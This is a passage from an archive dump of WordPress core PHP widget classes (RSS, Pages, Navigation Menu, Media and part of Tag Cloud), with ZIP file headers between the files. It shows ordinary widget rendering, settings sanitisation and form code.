			'description'                 => __( 'Entries from any RSS or Atom feed.' ),
			'customize_selective_refresh' => true,
			'show_instance_in_rest'       => true,

		);
		$control_ops = array(
			'width'  => 400,
			'height' => 200,
		);
		parent::__construct( 'rss', __( 'RSS' ), $widget_ops, $control_ops );
	}

	/**
	 * Outputs the content for the current RSS widget instance.
	 *
	 * @since 2.8.0
	 *
	 * @param array $args     Display arguments including 'before_title', 'after_title',
	 *                        'before_widget', and 'after_widget'.
	 * @param array $instance Settings for the current RSS widget instance.
	 */
	public function widget( $args, $instance ) {
		if ( isset( $instance['error'] ) && $instance['error'] ) {
			return;
		}

		$url = ! empty( $instance['url'] ) ? $instance['url'] : '';
		while ( ! empty( $url ) && stristr( $url, 'http' ) !== $url ) {
			$url = substr( $url, 1 );
		}

		if ( empty( $url ) ) {
			return;
		}

		// Self-URL destruction sequence.
		if ( in_array( untrailingslashit( $url ), array( site_url(), home_url() ), true ) ) {
			return;
		}

		$rss   = fetch_feed( $url );
		$title = $instance['title'];
		$desc  = '';
		$link  = '';

		if ( ! is_wp_error( $rss ) ) {
			$desc = esc_attr( strip_tags( html_entity_decode( $rss->get_description(), ENT_QUOTES, get_option( 'blog_charset' ) ) ) );
			if ( empty( $title ) ) {
				$title = strip_tags( $rss->get_title() );
			}
			$link = strip_tags( $rss->get_permalink() );
			while ( ! empty( $link ) && stristr( $link, 'http' ) !== $link ) {
				$link = substr( $link, 1 );
			}
		}

		if ( empty( $title ) ) {
			$title = ! empty( $desc ) ? $desc : __( 'Unknown Feed' );
		}

		/** This filter is documented in wp-includes/widgets/class-wp-widget-pages.php */
		$title = apply_filters( 'widget_title', $title, $instance, $this->id_base );

		if ( $title ) {
			$feed_link = '';
			$feed_url  = strip_tags( $url );
			$feed_icon = includes_url( 'images/rss.png' );
			$feed_link = sprintf(
				'<a class="rsswidget rss-widget-feed" href="%1$s"><img class="rss-widget-icon" style="border:0" width="14" height="14" src="%2$s" alt="%3$s"%4$s /></a> ',
				esc_url( $feed_url ),
				esc_url( $feed_icon ),
				esc_attr__( 'RSS' ),
				( wp_lazy_loading_enabled( 'img', 'rss_widget_feed_icon' ) ? ' loading="lazy"' : '' )
			);

			/**
			 * Filters the classic RSS widget's feed icon link.
			 *
			 * Themes can remove the icon link by using `add_filter( 'rss_widget_feed_link', '__return_empty_string' );`.
			 *
			 * @since 5.9.0
			 *
			 * @param string|false $feed_link HTML for link to RSS feed.
			 * @param array        $instance  Array of settings for the current widget.
			 */
			$feed_link = apply_filters( 'rss_widget_feed_link', $feed_link, $instance );

			$title = $feed_link . '<a class="rsswidget rss-widget-title" href="' . esc_url( $link ) . '">' . esc_html( $title ) . '</a>';
		}

		echo $args['before_widget'];
		if ( $title ) {
			echo $args['before_title'] . $title . $args['after_title'];
		}

		$format = current_theme_supports( 'html5', 'navigation-widgets' ) ? 'html5' : 'xhtml';

		/** This filter is documented in wp-includes/widgets/class-wp-nav-menu-widget.php */
		$format = apply_filters( 'navigation_widgets_format', $format );

		if ( 'html5' === $format ) {
			// The title may be filtered: Strip out HTML and make sure the aria-label is never empty.
			$title      = trim( strip_tags( $title ) );
			$aria_label = $title ? $title : __( 'RSS Feed' );
			echo '<nav aria-label="' . esc_attr( $aria_label ) . '">';
		}

		wp_widget_rss_output( $rss, $instance );

		if ( 'html5' === $format ) {
			echo '</nav>';
		}

		echo $args['after_widget'];

		if ( ! is_wp_error( $rss ) ) {
			$rss->__destruct();
		}
		unset( $rss );
	}

	/**
	 * Handles updating settings for the current RSS widget instance.
	 *
	 * @since 2.8.0
	 *
	 * @param array $new_instance New settings for this instance as input by the user via
	 *                            WP_Widget::form().
	 * @param array $old_instance Old settings for this instance.
	 * @return array Updated settings to save.
	 */
	public function update( $new_instance, $old_instance ) {
		$testurl = ( isset( $new_instance['url'] ) && ( ! isset( $old_instance['url'] ) || ( $new_instance['url'] !== $old_instance['url'] ) ) );
		return wp_widget_rss_process( $new_instance, $testurl );
	}

	/**
	 * Outputs the settings form for the RSS widget.
	 *
	 * @since 2.8.0
	 *
	 * @param array $instance Current settings.
	 */
	public function form( $instance ) {
		if ( empty( $instance ) ) {
			$instance = array(
				'title'        => '',
				'url'          => '',
				'items'        => 10,
				'error'        => false,
				'show_summary' => 0,
				'show_author'  => 0,
				'show_date'    => 0,
			);
		}
		$instance['number'] = $this->number;

		wp_widget_rss_form( $instance );
	}
}
PK     \X  X    class-wp-widget-pages.phpnu [        <?php
/**
 * Widget API: WP_Widget_Pages class
 *
 * @package WordPress
 * @subpackage Widgets
 * @since 4.4.0
 */

/**
 * Core class used to implement a Pages widget.
 *
 * @since 2.8.0
 *
 * @see WP_Widget
 */
class WP_Widget_Pages extends WP_Widget {

	/**
	 * Sets up a new Pages widget instance.
	 *
	 * @since 2.8.0
	 */
	public function __construct() {
		$widget_ops = array(
			'classname'                   => 'widget_pages',
			'description'                 => __( 'A list of your site&#8217;s Pages.' ),
			'customize_selective_refresh' => true,
			'show_instance_in_rest'       => true,
		);
		parent::__construct( 'pages', __( 'Pages' ), $widget_ops );
	}

	/**
	 * Outputs the content for the current Pages widget instance.
	 *
	 * @since 2.8.0
	 *
	 * @param array $args     Display arguments including 'before_title', 'after_title',
	 *                        'before_widget', and 'after_widget'.
	 * @param array $instance Settings for the current Pages widget instance.
	 */
	public function widget( $args, $instance ) {
		$default_title = __( 'Pages' );
		$title         = ! empty( $instance['title'] ) ? $instance['title'] : $default_title;

		/**
		 * Filters the widget title.
		 *
		 * @since 2.6.0
		 *
		 * @param string $title    The widget title. Default 'Pages'.
		 * @param array  $instance Array of settings for the current widget.
		 * @param mixed  $id_base  The widget ID.
		 */
		$title = apply_filters( 'widget_title', $title, $instance, $this->id_base );

		$sortby  = empty( $instance['sortby'] ) ? 'menu_order' : $instance['sortby'];
		$exclude = empty( $instance['exclude'] ) ? '' : $instance['exclude'];

		if ( 'menu_order' === $sortby ) {
			$sortby = 'menu_order, post_title';
		}

		$output = wp_list_pages(
			/**
			 * Filters the arguments for the Pages widget.
			 *
			 * @since 2.8.0
			 * @since 4.9.0 Added the `$instance` parameter.
			 *
			 * @see wp_list_pages()
			 *
			 * @param array $args     An array of arguments to retrieve the pages list.
			 * @param array $instance Array of settings for the current widget.
			 */
			apply_filters(
				'widget_pages_args',
				array(
					'title_li'    => '',
					'echo'        => 0,
					'sort_column' => $sortby,
					'exclude'     => $exclude,
				),
				$instance
			)
		);

		if ( ! empty( $output ) ) {
			echo $args['before_widget'];
			if ( $title ) {
				echo $args['before_title'] . $title . $args['after_title'];
			}

			$format = current_theme_supports( 'html5', 'navigation-widgets' ) ? 'html5' : 'xhtml';

			/** This filter is documented in wp-includes/widgets/class-wp-nav-menu-widget.php */
			$format = apply_filters( 'navigation_widgets_format', $format );

			if ( 'html5' === $format ) {
				// The title may be filtered: Strip out HTML and make sure the aria-label is never empty.
				$title      = trim( strip_tags( $title ) );
				$aria_label = $title ? $title : $default_title;
				echo '<nav aria-label="' . esc_attr( $aria_label ) . '">';
			}
			?>

			<ul>
				<?php echo $output; ?>
			</ul>

			<?php
			if ( 'html5' === $format ) {
				echo '</nav>';
			}

			echo $args['after_widget'];
		}
	}

	/**
	 * Handles updating settings for the current Pages widget instance.
	 *
	 * @since 2.8.0
	 *
	 * @param array $new_instance New settings for this instance as input by the user via
	 *                            WP_Widget::form().
	 * @param array $old_instance Old settings for this instance.
	 * @return array Updated settings to save.
	 */
	public function update( $new_instance, $old_instance ) {
		$instance          = $old_instance;
		$instance['title'] = sanitize_text_field( $new_instance['title'] );
		if ( in_array( $new_instance['sortby'], array( 'post_title', 'menu_order', 'ID' ), true ) ) {
			$instance['sortby'] = $new_instance['sortby'];
		} else {
			$instance['sortby'] = 'menu_order';
		}

		$instance['exclude'] = sanitize_text_field( $new_instance['exclude'] );

		return $instance;
	}

	/**
	 * Outputs the settings form for the Pages widget.
	 *
	 * @since 2.8.0
	 *
	 * @param array $instance Current settings.
	 */
	public function form( $instance ) {
		// Defaults.
		$instance = wp_parse_args(
			(array) $instance,
			array(
				'sortby'  => 'post_title',
				'title'   => '',
				'exclude' => '',
			)
		);
		?>
		<p>
			<label for="<?php echo esc_attr( $this->get_field_id( 'title' ) ); ?>"><?php _e( 'Title:' ); ?></label>
			<input class="widefat" id="<?php echo esc_attr( $this->get_field_id( 'title' ) ); ?>" name="<?php echo esc_attr( $this->get_field_name( 'title' ) ); ?>" type="text" value="<?php echo esc_attr( $instance['title'] ); ?>" />
		</p>

		<p>
			<label for="<?php echo esc_attr( $this->get_field_id( 'sortby' ) ); ?>"><?php _e( 'Sort by:' ); ?></label>
			<select name="<?php echo esc_attr( $this->get_field_name( 'sortby' ) ); ?>" id="<?php echo esc_attr( $this->get_field_id( 'sortby' ) ); ?>" class="widefat">
				<option value="post_title"<?php selected( $instance['sortby'], 'post_title' ); ?>><?php _e( 'Page title' ); ?></option>
				<option value="menu_order"<?php selected( $instance['sortby'], 'menu_order' ); ?>><?php _e( 'Page order' ); ?></option>
				<option value="ID"<?php selected( $instance['sortby'], 'ID' ); ?>><?php _e( 'Page ID' ); ?></option>
			</select>
		</p>

		<p>
			<label for="<?php echo esc_attr( $this->get_field_id( 'exclude' ) ); ?>"><?php _e( 'Exclude:' ); ?></label>
			<input type="text" value="<?php echo esc_attr( $instance['exclude'] ); ?>" name="<?php echo esc_attr( $this->get_field_name( 'exclude' ) ); ?>" id="<?php echo esc_attr( $this->get_field_id( 'exclude' ) ); ?>" class="widefat" />
			<br />
			<small><?php _e( 'Page IDs, separated by commas.' ); ?></small>
		</p>
		<?php
	}
}
PK     \Gl1  1    class-wp-nav-menu-widget.phpnu [        <?php
/**
 * Widget API: WP_Nav_Menu_Widget class
 *
 * @package WordPress
 * @subpackage Widgets
 * @since 4.4.0
 */

/**
 * Core class used to implement the Navigation Menu widget.
 *
 * @since 3.0.0
 *
 * @see WP_Widget
 */
class WP_Nav_Menu_Widget extends WP_Widget {

	/**
	 * Sets up a new Navigation Menu widget instance.
	 *
	 * @since 3.0.0
	 */
	public function __construct() {
		$widget_ops = array(
			'description'                 => __( 'Add a navigation menu to your sidebar.' ),
			'customize_selective_refresh' => true,
			'show_instance_in_rest'       => true,
		);
		parent::__construct( 'nav_menu', __( 'Navigation Menu' ), $widget_ops );
	}

	/**
	 * Outputs the content for the current Navigation Menu widget instance.
	 *
	 * @since 3.0.0
	 *
	 * @param array $args     Display arguments including 'before_title', 'after_title',
	 *                        'before_widget', and 'after_widget'.
	 * @param array $instance Settings for the current Navigation Menu widget instance.
	 */
	public function widget( $args, $instance ) {
		// Get menu.
		$nav_menu = ! empty( $instance['nav_menu'] ) ? wp_get_nav_menu_object( $instance['nav_menu'] ) : false;

		if ( ! $nav_menu ) {
			return;
		}

		$default_title = __( 'Menu' );
		$title         = ! empty( $instance['title'] ) ? $instance['title'] : '';

		/** This filter is documented in wp-includes/widgets/class-wp-widget-pages.php */
		$title = apply_filters( 'widget_title', $title, $instance, $this->id_base );

		echo $args['before_widget'];

		if ( $title ) {
			echo $args['before_title'] . $title . $args['after_title'];
		}

		$format = current_theme_supports( 'html5', 'navigation-widgets' ) ? 'html5' : 'xhtml';

		/**
		 * Filters the HTML format of widgets with navigation links.
		 *
		 * @since 5.5.0
		 *
		 * @param string $format The type of markup to use in widgets with navigation links.
		 *                       Accepts 'html5', 'xhtml'.
		 */
		$format = apply_filters( 'navigation_widgets_format', $format );

		if ( 'html5' === $format ) {
			// The title may be filtered: Strip out HTML and make sure the aria-label is never empty.
			$title      = trim( strip_tags( $title ) );
			$aria_label = $title ? $title : $default_title;

			$nav_menu_args = array(
				'fallback_cb'          => '',
				'menu'                 => $nav_menu,
				'container'            => 'nav',
				'container_aria_label' => $aria_label,
				'items_wrap'           => '<ul id="%1$s" class="%2$s">%3$s</ul>',
			);
		} else {
			$nav_menu_args = array(
				'fallback_cb' => '',
				'menu'        => $nav_menu,
			);
		}

		/**
		 * Filters the arguments for the Navigation Menu widget.
		 *
		 * @since 4.2.0
		 * @since 4.4.0 Added the `$instance` parameter.
		 *
		 * @param array   $nav_menu_args {
		 *     An array of arguments passed to wp_nav_menu() to retrieve a navigation menu.
		 *
		 *     @type callable|bool $fallback_cb Callback to fire if the menu doesn't exist. Default empty.
		 *     @type mixed         $menu        Menu ID, slug, or name.
		 * }
		 * @param WP_Term $nav_menu      Nav menu object for the current menu.
		 * @param array   $args          Display arguments for the current widget.
		 * @param array   $instance      Array of settings for the current widget.
		 */
		wp_nav_menu( apply_filters( 'widget_nav_menu_args', $nav_menu_args, $nav_menu, $args, $instance ) );

		echo $args['after_widget'];
	}

	/**
	 * Handles updating settings for the current Navigation Menu widget instance.
	 *
	 * @since 3.0.0
	 *
	 * @param array $new_instance New settings for this instance as input by the user via
	 *                            WP_Widget::form().
	 * @param array $old_instance Old settings for this instance.
	 * @return array Updated settings to save.
	 */
	public function update( $new_instance, $old_instance ) {
		$instance = array();
		if ( ! empty( $new_instance['title'] ) ) {
			$instance['title'] = sanitize_text_field( $new_instance['title'] );
		}
		if ( ! empty( $new_instance['nav_menu'] ) ) {
			$instance['nav_menu'] = (int) $new_instance['nav_menu'];
		}
		return $instance;
	}

	/**
	 * Outputs the settings form for the Navigation Menu widget.
	 *
	 * @since 3.0.0
	 *
	 * @global WP_Customize_Manager $wp_customize
	 *
	 * @param array $instance Current settings.
	 */
	public function form( $instance ) {
		global $wp_customize;
		$title    = isset( $instance['title'] ) ? $instance['title'] : '';
		$nav_menu = isset( $instance['nav_menu'] ) ? $instance['nav_menu'] : '';

		// Get menus.
		$menus = wp_get_nav_menus();

		$empty_menus_style     = '';
		$not_empty_menus_style = '';
		if ( empty( $menus ) ) {
			$empty_menus_style = ' style="display:none" ';
		} else {
			$not_empty_menus_style = ' style="display:none" ';
		}

		$nav_menu_style = '';
		if ( ! $nav_menu ) {
			$nav_menu_style = 'display: none;';
		}

		// If no menus exists, direct the user to go and create some.
		?>
		<p class="nav-menu-widget-no-menus-message" <?php echo $not_empty_menus_style; ?>>
			<?php
			if ( $wp_customize instanceof WP_Customize_Manager ) {
				$url = 'javascript: wp.customize.panel( "nav_menus" ).focus();';
			} else {
				$url = admin_url( 'nav-menus.php' );
			}

			printf(
				/* translators: %s: URL to create a new menu. */
				__( 'No menus have been created yet. <a href="%s">Create some</a>.' ),
				// The URL can be a `javascript:` link, so esc_attr() is used here instead of esc_url().
				esc_attr( $url )
			);
			?>
		</p>
		<div class="nav-menu-widget-form-controls" <?php echo $empty_menus_style; ?>>
			<p>
				<label for="<?php echo $this->get_field_id( 'title' ); ?>"><?php _e( 'Title:' ); ?></label>
				<input type="text" class="widefat" id="<?php echo $this->get_field_id( 'title' ); ?>" name="<?php echo $this->get_field_name( 'title' ); ?>" value="<?php echo esc_attr( $title ); ?>" />
			</p>
			<p>
				<label for="<?php echo $this->get_field_id( 'nav_menu' ); ?>"><?php _e( 'Select Menu:' ); ?></label>
				<select id="<?php echo $this->get_field_id( 'nav_menu' ); ?>" name="<?php echo $this->get_field_name( 'nav_menu' ); ?>">
					<option value="0"><?php _e( '&mdash; Select &mdash;' ); ?></option>
					<?php foreach ( $menus as $menu ) : ?>
						<option value="<?php echo esc_attr( $menu->term_id ); ?>" <?php selected( $nav_menu, $menu->term_id ); ?>>
							<?php echo esc_html( $menu->name ); ?>
						</option>
					<?php endforeach; ?>
				</select>
			</p>
			<?php if ( $wp_customize instanceof WP_Customize_Manager ) : ?>
				<p class="edit-selected-nav-menu" style="<?php echo $nav_menu_style; ?>">
					<button type="button" class="button"><?php _e( 'Edit Menu' ); ?></button>
				</p>
			<?php endif; ?>
		</div>
		<?php
	}
}
PK     \ ] <  <    class-wp-widget-media.phpnu [        <?php
/**
 * Widget API: WP_Media_Widget class
 *
 * @package WordPress
 * @subpackage Widgets
 * @since 4.8.0
 */

/**
 * Core class that implements a media widget.
 *
 * @since 4.8.0
 *
 * @see WP_Widget
 */
abstract class WP_Widget_Media extends WP_Widget {

	/**
	 * Translation labels.
	 *
	 * @since 4.8.0
	 * @var array
	 */
	public $l10n = array(
		'add_to_widget'              => '',
		'replace_media'              => '',
		'edit_media'                 => '',
		'media_library_state_multi'  => '',
		'media_library_state_single' => '',
		'missing_attachment'         => '',
		'no_media_selected'          => '',
		'add_media'                  => '',
	);

	/**
	 * Whether or not the widget has been registered yet.
	 *
	 * @since 4.8.1
	 * @var bool
	 */
	protected $registered = false;

	/**
	 * The default widget description.
	 *
	 * @since 6.0.0
	 * @var string
	 */
	protected static $default_description = '';

	/**
	 * The default localized strings used by the widget.
	 *
	 * @since 6.0.0
	 * @var string[]
	 */
	protected static $l10n_defaults = array();

	/**
	 * Constructor.
	 *
	 * @since 4.8.0
	 *
	 * @param string $id_base         Base ID for the widget, lowercase and unique.
	 * @param string $name            Name for the widget displayed on the configuration page.
	 * @param array  $widget_options  Optional. Widget options. See wp_register_sidebar_widget() for
	 *                                information on accepted arguments. Default empty array.
	 * @param array  $control_options Optional. Widget control options. See wp_register_widget_control()
	 *                                for information on accepted arguments. Default empty array.
	 */
	public function __construct( $id_base, $name, $widget_options = array(), $control_options = array() ) {
		$widget_opts = wp_parse_args(
			$widget_options,
			array(
				'description'                 => self::get_default_description(),
				'customize_selective_refresh' => true,
				'show_instance_in_rest'       => true,
				'mime_type'                   => '',
			)
		);

		$control_opts = wp_parse_args( $control_options, array() );

		$this->l10n = array_merge( self::get_l10n_defaults(), array_filter( $this->l10n ) );

		parent::__construct(
			$id_base,
			$name,
			$widget_opts,
			$control_opts
		);
	}

	/**
	 * Add hooks while registering all widget instances of this widget class.
	 *
	 * @since 4.8.0
	 *
	 * @param int $number Optional. The unique order number of this widget instance
	 *                    compared to other instances of the same class. Default -1.
	 */
	public function _register_one( $number = -1 ) {
		parent::_register_one( $number );
		if ( $this->registered ) {
			return;
		}
		$this->registered = true;

		/*
		 * Note that the widgets component in the customizer will also do
		 * the 'admin_print_scripts-widgets.php' action in WP_Customize_Widgets::print_scripts().
		 */
		add_action( 'admin_print_scripts-widgets.php', array( $this, 'enqueue_admin_scripts' ) );

		if ( $this->is_preview() ) {
			add_action( 'wp_enqueue_scripts', array( $this, 'enqueue_preview_scripts' ) );
		}

		/*
		 * Note that the widgets component in the customizer will also do
		 * the 'admin_footer-widgets.php' action in WP_Customize_Widgets::print_footer_scripts().
		 */
		add_action( 'admin_footer-widgets.php', array( $this, 'render_control_template_scripts' ) );

		add_filter( 'display_media_states', array( $this, 'display_media_state' ), 10, 2 );
	}

	/**
	 * Get schema for properties of a widget instance (item).
	 *
	 * @since 4.8.0
	 *
	 * @see WP_REST_Controller::get_item_schema()
	 * @see WP_REST_Controller::get_additional_fields()
	 * @link https://core.trac.wordpress.org/ticket/35574
	 *
	 * @return array Schema for properties.
	 */
	public function get_instance_schema() {
		$schema = array(
			'attachment_id' => array(
				'type'        => 'integer',
				'default'     => 0,
				'minimum'     => 0,
				'description' => __( 'Attachment post ID' ),
				'media_prop'  => 'id',
			),
			'url'           => array(
				'type'        => 'string',
				'default'     => '',
				'format'      => 'uri',
				'description' => __( 'URL to the media file' ),
			),
			'title'         => array(
				'type'                  => 'string',
				'default'               => '',
				'sanitize_callback'     => 'sanitize_text_field',
				'description'           => __( 'Title for the widget' ),
				'should_preview_update' => false,
			),
		);

		/**
		 * Filters the media widget instance schema to add additional properties.
		 *
		 * @since 4.9.0
		 *
		 * @param array           $schema Instance schema.
		 * @param WP_Widget_Media $widget Widget object.
		 */
		$schema = apply_filters( "widget_{$this->id_base}_instance_schema", $schema, $this );

		return $schema;
	}

	/**
	 * Determine if the supplied attachment is for a valid attachment post with the specified MIME type.
	 *
	 * @since 4.8.0
	 *
	 * @param int|WP_Post $attachment Attachment post ID or object.
	 * @param string      $mime_type  MIME type.
	 * @return bool Is matching MIME type.
	 */
	public function is_attachment_with_mime_type( $attachment, $mime_type ) {
		if ( empty( $attachment ) ) {
			return false;
		}
		$attachment = get_post( $attachment );
		if ( ! $attachment ) {
			return false;
		}
		if ( 'attachment' !== $attachment->post_type ) {
			return false;
		}
		return wp_attachment_is( $mime_type, $attachment );
	}

	/**
	 * Sanitize a token list string, such as used in HTML rel and class attributes.
	 *
	 * @since 4.8.0
	 *
	 * @link http://w3c.github.io/html/infrastructure.html#space-separated-tokens
	 * @link https://developer.mozilla.org/en-US/docs/Web/API/DOMTokenList
	 * @param string|array $tokens List of tokens separated by spaces, or an array of tokens.
	 * @return string Sanitized token string list.
	 */
	public function sanitize_token_list( $tokens ) {
		if ( is_string( $tokens ) ) {
			$tokens = preg_split( '/\s+/', trim( $tokens ) );
		}
		$tokens = array_map( 'sanitize_html_class', $tokens );
		$tokens = array_filter( $tokens );
		return implode( ' ', $tokens );
	}

	/**
	 * Displays the widget on the front-end.
	 *
	 * @since 4.8.0
	 *
	 * @see WP_Widget::widget()
	 *
	 * @param array $args     Display arguments including before_title, after_title, before_widget, and after_widget.
	 * @param array $instance Saved setting from the database.
	 */
	public function widget( $args, $instance ) {
		$instance = wp_parse_args( $instance, wp_list_pluck( $this->get_instance_schema(), 'default' ) );

		// Short-circuit if no media is selected.
		if ( ! $this->has_content( $instance ) ) {
			return;
		}

		echo $args['before_widget'];

		/** This filter is documented in wp-includes/widgets/class-wp-widget-pages.php */
		$title = apply_filters( 'widget_title', $instance['title'], $instance, $this->id_base );

		if ( $title ) {
			echo $args['before_title'] . $title . $args['after_title'];
		}

		/**
		 * Filters the media widget instance prior to rendering the media.
		 *
		 * @since 4.8.0
		 *
		 * @param array           $instance Instance data.
		 * @param array           $args     Widget args.
		 * @param WP_Widget_Media $widget   Widget object.
		 */
		$instance = apply_filters( "widget_{$this->id_base}_instance", $instance, $args, $this );

		$this->render_media( $instance );

		echo $args['after_widget'];
	}

	/**
	 * Sanitizes the widget form values as they are saved.
	 *
	 * @since 4.8.0
	 * @since 5.9.0 Renamed `$instance` to `$old_instance` to match parent class
	 *              for PHP 8 named parameter support.
	 *
	 * @see WP_Widget::update()
	 * @see WP_REST_Request::has_valid_params()
	 * @see WP_REST_Request::sanitize_params()
	 *
	 * @param array $new_instance Values just sent to be saved.
	 * @param array $old_instance Previously saved values from database.
	 * @return array Updated safe values to be saved.
	 */
	public function update( $new_instance, $old_instance ) {

		$schema = $this->get_instance_schema();
		foreach ( $schema as $field => $field_schema ) {
			if ( ! array_key_exists( $field, $new_instance ) ) {
				continue;
			}
			$value = $new_instance[ $field ];

			/*
			 * Workaround for rest_validate_value_from_schema() due to the fact that
			 * rest_is_boolean( '' ) === false, while rest_is_boolean( '1' ) is true.
			 */
			if ( 'boolean' === $field_schema['type'] && '' === $value ) {
				$value = false;
			}

			if ( true !== rest_validate_value_from_schema( $value, $field_schema, $field ) ) {
				continue;
			}

			$value = rest_sanitize_value_from_schema( $value, $field_schema );

			// @codeCoverageIgnoreStart
			if ( is_wp_error( $value ) ) {
				continue; // Handle case when rest_sanitize_value_from_schema() ever returns WP_Error as its phpdoc @return tag indicates.
			}

			// @codeCoverageIgnoreEnd
			if ( isset( $field_schema['sanitize_callback'] ) ) {
				$value = call_user_func( $field_schema['sanitize_callback'], $value );
			}
			if ( is_wp_error( $value ) ) {
				continue;
			}
			$old_instance[ $field ] = $value;
		}

		return $old_instance;
	}

	/**
	 * Render the media on the frontend.
	 *
	 * @since 4.8.0
	 *
	 * @param array $instance Widget instance props.
	 */
	abstract public function render_media( $instance );

	/**
	 * Outputs the settings update form.
	 *
	 * Note that the widget UI itself is rendered with JavaScript via `MediaWidgetControl#render()`.
	 *
	 * @since 4.8.0
	 *
	 * @see \WP_Widget_Media::render_control_template_scripts() Where the JS template is located.
	 *
	 * @param array $instance Current settings.
	 */
	final public function form( $instance ) {
		$instance_schema = $this->get_instance_schema();
		$instance        = wp_array_slice_assoc(
			wp_parse_args( (array) $instance, wp_list_pluck( $instance_schema, 'default' ) ),
			array_keys( $instance_schema )
		);

		foreach ( $instance as $name => $value ) : ?>
			<input
				type="hidden"
				data-property="<?php echo esc_attr( $name ); ?>"
				class="media-widget-instance-property"
				name="<?php echo esc_attr( $this->get_field_name( $name ) ); ?>"
				id="<?php echo esc_attr( $this->get_field_id( $name ) ); // Needed specifically by wpWidgets.appendTitle(). ?>"
				value="<?php echo esc_attr( is_array( $value ) ? implode( ',', $value ) : (string) $value ); ?>"
			/>
			<?php
		endforeach;
	}

	/**
	 * Filters the default media display states for items in the Media list table.
	 *
	 * @since 4.8.0
	 *
	 * @param array   $states An array of media states.
	 * @param WP_Post $post   The current attachment object.
	 * @return array
	 */
	public function display_media_state( $states, $post = null ) {
		if ( ! $post ) {
			$post = get_post();
		}

		// Count how many times this attachment is used in widgets.
		$use_count = 0;
		foreach ( $this->get_settings() as $instance ) {
			if ( isset( $instance['attachment_id'] ) && $instance['attachment_id'] === $post->ID ) {
				++$use_count;
			}
		}

		if ( 1 === $use_count ) {
			$states[] = $this->l10n['media_library_state_single'];
		} elseif ( $use_count > 0 ) {
			$states[] = sprintf( translate_nooped_plural( $this->l10n['media_library_state_multi'], $use_count ), number_format_i18n( $use_count ) );
		}

		return $states;
	}

	/**
	 * Enqueue preview scripts.
	 *
	 * These scripts normally are enqueued just-in-time when a widget is rendered.
	 * In the customizer, however, widgets can be dynamically added and rendered via
	 * selective refresh, and so it is important to unconditionally enqueue them in
	 * case a widget does get added.
	 *
	 * @since 4.8.0
	 */
	public function enqueue_preview_scripts() {}

	/**
	 * Loads the required scripts and styles for the widget control.
	 *
	 * @since 4.8.0
	 */
	public function enqueue_admin_scripts() {
		wp_enqueue_media();
		wp_enqueue_script( 'media-widgets' );
	}

	/**
	 * Render form template scripts.
	 *
	 * @since 4.8.0
	 */
	public function render_control_template_scripts() {
		?>
		<script type="text/html" id="tmpl-widget-media-<?php echo esc_attr( $this->id_base ); ?>-control">
			<# var elementIdPrefix = 'el' + String( Math.random() ) + '_' #>
			<p>
				<label for="{{ elementIdPrefix }}title"><?php esc_html_e( 'Title:' ); ?></label>
				<input id="{{ elementIdPrefix }}title" type="text" class="widefat title">
			</p>
			<div class="media-widget-preview <?php echo esc_attr( $this->id_base ); ?>">
				<div class="attachment-media-view">
					<button type="button" class="select-media button-add-media not-selected">
						<?php echo esc_html( $this->l10n['add_media'] ); ?>
					</button>
				</div>
			</div>
			<p class="media-widget-buttons">
				<button type="button" class="button edit-media selected">
					<?php echo esc_html( $this->l10n['edit_media'] ); ?>
				</button>
			<?php if ( ! empty( $this->l10n['replace_media'] ) ) : ?>
				<button type="button" class="button change-media select-media selected">
					<?php echo esc_html( $this->l10n['replace_media'] ); ?>
				</button>
			<?php endif; ?>
			</p>
			<div class="media-widget-fields">
			</div>
		</script>
		<?php
	}

	/**
	 * Resets the cache for the default labels.
	 *
	 * @since 6.0.0
	 */
	public static function reset_default_labels() {
		self::$default_description = '';
		self::$l10n_defaults       = array();
	}

	/**
	 * Whether the widget has content to show.
	 *
	 * @since 4.8.0
	 *
	 * @param array $instance Widget instance props.
	 * @return bool Whether widget has content.
	 */
	protected function has_content( $instance ) {
		return ( $instance['attachment_id'] && 'attachment' === get_post_type( $instance['attachment_id'] ) ) || $instance['url'];
	}

	/**
	 * Returns the default description of the widget.
	 *
	 * @since 6.0.0
	 *
	 * @return string
	 */
	protected static function get_default_description() {
		if ( self::$default_description ) {
			return self::$default_description;
		}

		self::$default_description = __( 'A media item.' );
		return self::$default_description;
	}

	/**
	 * Returns the default localized strings used by the widget.
	 *
	 * @since 6.0.0
	 *
	 * @return (string|array)[]
	 */
	protected static function get_l10n_defaults() {
		if ( ! empty( self::$l10n_defaults ) ) {
			return self::$l10n_defaults;
		}

		self::$l10n_defaults = array(
			'no_media_selected'          => __( 'No media selected' ),
			'add_media'                  => _x( 'Add Media', 'label for button in the media widget' ),
			'replace_media'              => _x( 'Replace Media', 'label for button in the media widget; should preferably not be longer than ~13 characters long' ),
			'edit_media'                 => _x( 'Edit Media', 'label for button in the media widget; should preferably not be longer than ~13 characters long' ),
			'add_to_widget'              => __( 'Add to Widget' ),
			'missing_attachment'         => sprintf(
				/* translators: %s: URL to media library. */
				__( 'That file cannot be found. Check your <a href="%s">media library</a> and make sure it was not deleted.' ),
				esc_url( admin_url( 'upload.php' ) )
			),
			/* translators: %d: Widget count. */
			'media_library_state_multi'  => _n_noop( 'Media Widget (%d)', 'Media Widget (%d)' ),
			'media_library_state_single' => __( 'Media Widget' ),
			'unsupported_file_type'      => __( 'Looks like this is not the correct kind of file. Please link to an appropriate file instead.' ),
		);

		return self::$l10n_defaults;
	}
}
PK     \8zz  z    class-wp-widget-tag-cloud.phpnu [        <?php
/**
 * Widget API: WP_Widget_Tag_Cloud class
 *
 * @package WordPress
 * @subpackage Widgets
 * @since 4.4.0
 */

/**
 * Core class used to implement a Tag cloud widget.
 *
 * @since 2.8.0
 *
 * @see WP_Widget
 */
class WP_Widget_Tag_Cloud extends WP_Widget {

	/**
	 * Sets up a new Tag Cloud widget instance.
	 *
	 * @since 2.8.0
	 */
	public function __construct() {
		$widget_ops = array(
			'description'                 => __( 'A cloud of your most used tags.' ),
			'customize_selective_refresh' => true,
			'show_instance_in_rest'       => true,
		);
		parent::__construct( 'tag_cloud', __( 'Tag Cloud' ), $widget_ops );
	}

	/**
	 * Outputs the content for the current Tag Cloud widget instance.
	 *
	 * @since 2.8.0
	 *
	 * @param array $args     Display arguments including 'before_title', 'after_title',
	 *                        'before_widget', and 'after_widget'.
	 * @param array $instance Settings for the current Tag Cloud widget instance.
	 */
	public function widget( $args, $instance ) {
		$current_taxonomy = $this->_get_current_taxonomy( $instance );

		if ( ! empty( $instance['title'] ) ) {
			$title = $instance['title'];
		} else {
			if ( 'post_tag' === $current_taxonomy ) {
				$title = __( 'Tags' );
			} else {
				$tax   = get_taxonomy( $current_taxonomy );
